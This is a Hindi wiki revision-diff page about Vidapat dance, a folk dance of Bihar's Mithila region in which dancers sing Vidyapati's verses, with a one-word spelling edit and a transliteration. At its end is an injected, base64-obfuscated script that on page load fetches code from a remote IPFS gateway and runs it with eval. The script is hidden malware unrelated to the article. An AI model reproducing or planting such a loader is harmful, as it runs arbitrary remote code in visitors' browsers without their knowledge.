Difference between revisions of "विदापत नृत्य"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''विदापत नृत्य''' बिहार के लोक नृत्यों मे...' के साथ नया पन्ना बनाया)
 
m (Text replacement - " महान " to " महान् ")
 
Line 1: Line 1:
 
'''विदापत नृत्य''' [[बिहार]] के [[लोक नृत्य|लोक नृत्यों]] में से एक है। यह [[नृत्य]] राज्य के पूर्णिमा ज़िले (मिथिलांचल क्षेत्र) में किया जाता है।
 
'''विदापत नृत्य''' [[बिहार]] के [[लोक नृत्य|लोक नृत्यों]] में से एक है। यह [[नृत्य]] राज्य के पूर्णिमा ज़िले (मिथिलांचल क्षेत्र) में किया जाता है।
  
*इस प्रमुख लोक नृत्य में नर्तक सामूहिक रूप से [[मिथिला]] के महान कवि विद्यापति के पदों को गाते हैं।
+
*इस प्रमुख लोक नृत्य में नर्तक सामूहिक रूप से [[मिथिला]] के महान् कवि विद्यापति के पदों को गाते हैं।
 
*नर्तक पदों में वर्णित भावों को प्रस्तुत करते हुए नृत्य करते हैं।
 
*नर्तक पदों में वर्णित भावों को प्रस्तुत करते हुए नृत्य करते हैं।
  

Latest revision as of 11:28, 1 August 2017

vidapat nrity bihar ke lok nrityoan mean se ek hai. yah nrity rajy ke poornima zile (mithilaanchal kshetr) mean kiya jata hai.

  • is pramukh lok nrity mean nartak samoohik roop se mithila ke mahanh kavi vidyapati ke padoan ko gate haian.
  • nartak padoan mean varnit bhavoan ko prastut karate hue nrity karate haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>